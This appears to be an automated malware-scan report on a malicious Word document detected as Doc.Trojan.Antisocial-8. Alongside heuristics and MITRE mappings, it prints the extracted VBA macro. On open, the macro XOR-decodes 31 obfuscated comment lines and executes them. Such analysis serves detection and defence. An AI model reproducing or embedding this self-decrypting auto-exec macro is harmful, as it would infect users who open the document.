MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a malicious VBA macro. The Document_Open macro is designed to execute upon opening the document. This macro appears to deobfuscate and execute code, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Trojan.Antisocial-8' further supports its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Antisocial-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Antisocial-8
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10285 bytes |
SHA-256: dcea17e70b0871119bd16e05e811382bfc82edb3f9d3282e4b3696c81a5c363e |
|||
|
Detection
ClamAV:
Doc.Trojan.Antisocial-8
Obfuscation or payload:
likely
Carved artifact contains 18 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
For A = 17 To 47
B = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(A, 1)
C = Asc(Chr("&H" & Mid(B, 2, 2)))
E = 2
For D = C + 2 To Len(B) Step 2
E = E + 2
F = F & Chr(Asc(Chr("&H" & Mid(B, D, 2))) Xor Asc(Chr("&H" & Mid(B, E, 2))))
If E = C Then E = 2
Next
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine A, F
F = ""
Next
hAPEE
End Sub
Private Function hAPEE()
'1888944A4DC504C2CFB50C6AC7FA6A08B776ADBD955E0FFBE12728E54AA7B7C1
'1CC95FF5DE0FF25D86C30E97784C8F3087FE439B33E3B03CD2162FBB2685AA2FCF7DB7F42EC3176CFD68
'16A54447D3D296FBE83AB1EE213EF3EFB6D9CA
'203E881CFEAC04931A1BCB490C4C624D78E76EDEE761EA5674A4392C71427C1EDC73DEE56AE73249A52D2C66427C0BA13CD58C35
'20F96647292AA56969B653A135309515B2033E091785220CCF73871573FD67D12F295D02F7070D9679810705A13CD94D671803
'10E743C8614AEAA1A926B015
'166D198FB1E9D5068BE96E2E76EBD4C9E826DF81071E5DE0D29CB863E59D403B5BDFC386BF63E89D403B5BCCDE84A569E58C00196AA780C0FB45E48D0B2076EBC485B028C78000086AA7FD80BB63F8DB2B037AFDC899A12AABD847
'188083765A67450F3EF91064D4E61B2A47782F1CDB
'0E7D287942A08A354D0101CFEE1808446282A8
'08EFA78183C2EFA4C2F8CF9AA1DF
'0E1CC875C098D45AA707E0DDBA7FBA0CB0EC9873A705E0A5F42DE821AFB89879A65D83F7B079E1
'04365A53587D534F160B165A53587D534F161D1607
'061B554F3076253B683B017E386B753D75583D697D5A26787D563C7F7D583A7F3037755E3B782762256F19743A6B793B64327C3B0D74273B14683633187231331E7E2C37757730751E7E2C37752A7C327C
'06018948EF21E564E74AEC78A93CA94DEC6FA14AEC78A021DD69EC6FA96DEC6FC264F021B421B9
'168BD31531AD745B27B3ECC5B66D45
'1217C167767E35541952AF04040745205A78A502564315177165E94F3A1B5B7C5272B84E565415663037EA4744571572395CA41E565815007C7AB1
'142CEC197146DEBF46AC6489613229BADA66910CCE3B
'0A170852C9516720E9546736AC254037B1373572F8375C3DE95B6D3CE1526631BB6E78268A786C37E0
'0C3C7B41570C681E2C27445903616A2C741E397F4D4F18691A65585304396F4E0231234F531F247B2C7F1425323E741E397B2C0D52687E
'1235DC96C0EC558A157CBAB68C893BA24150B1E688892DA33508FCA7E0B83DEF7B1588F3AD9C1DEF6D15E1B6E2DC77AA331588F3AD9C1DEF6D
'1669F41EEB9E59267A38FD219166A8F13D435A05DD219166A8F13D435A1EDD3D91739BD63C5E
'060858463D702C
'14EB8968D8D2ABB8FE57BFE101AB96C4DB8B3A8EE71CF684E9E88C3881EC0BACFCFDFABD3886F907B6B7C5CC8D7FDAA0469BBDCFDDB3388FFC04BDFCF9DD8E3B8AEA0D94BBC5DDDE1B82E70DABE0EED69D2592F91CF4F2899FDC77CDA920BDAAE8D79A32
'1269B12E6C8ACF8A6D27D45618
'123A9E7DADE25F4D4B75EE09C48D313E656CF70FD8910F3F244EFB1ED98B30236B07BE4D97C2103D3F53F113DECC0C2C3D5FD012DF8F3E211B48F110DD967F706B0AA45DE2922B242454ED53EE8D312B2248F33EC28C29283949F712C3917F706B0A
'08873995D37DB5BA19C1EF50E6C356F6F254F0E94DBBD17BC5F556FFE25AE1A96FD7C456F8F756FBE257E1F411A4AE17D6E85DF0CA56F1F255F0A975FCE95CE6AF08B9A76DFDEE4AD1E85AE0EA5CFBF317C3C569E7E853F0E44DBBD17BD6E854E5E857F0E94DE6AF08BCA97AFAE35CD8E85DE0EB5CBBC456E0E94DDAE175FCE95CE6AE
'0EDF7A31AEBE9C961C11FAD6F5AC3E5ECDCBF1BA14458E83BC9E1945C7C8F99B1552DBD3F9B10E11FAD6F9B15A62CBCABC8B1B43C9DBE8FF4711E0D1EEB21B5DFADBF1AF1650DADBBC9A1642CB9ECFBA0E11FADFEEB81F458E83BC9E1945C7C8F99B1552DBD3F9B10E
'1A2ACE34F41110CA61761F1E2D7EAF46937464E437344F6C4240AB57803F46882219726E4244AB5A806238FB48585C71494F835B90647CAF4F327A72485EAB789D7F75B94147333E794BBC5391653E9C23266D71474FAD40DA4752890E1B6F71434FA040873921E34F35707A4867A150817D75E422196A705965A8789D7F75B9
'04B6E2D7C4D1D3C298E0F4E6C4D9DCD3D5C298E0F4F5D9DBC6D9D8D3D8C2C59E879F98F5D9D2D3FBD9D2C3DAD398F7D2D2F0C4D9DBE5C2C4DFD8D196E2F2
'128F3877BEC066E6BEC65E57EAA11481DBFB184A9E810592D7F95D33D1A3138BDBE14C57EAA803889ECE5B03D7B603A2D1EC4D1ADBAE12C8EDEE4E12FFB346A0D7E35D39DFAD03DC83CE5B03D7B603A2D1EC4D1ADBAE12C8F8FA541BF0A10B83
'06A2B6F6DECBC5E6D9C1C3CFD3CCC28CE5C3C0C7D2828B82E2D0C3C7
End Function
' Processing file: /opt/analyzer/scan_staging/751422be3f594d959b03a0ee79a68510.bin
' ====================================================
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.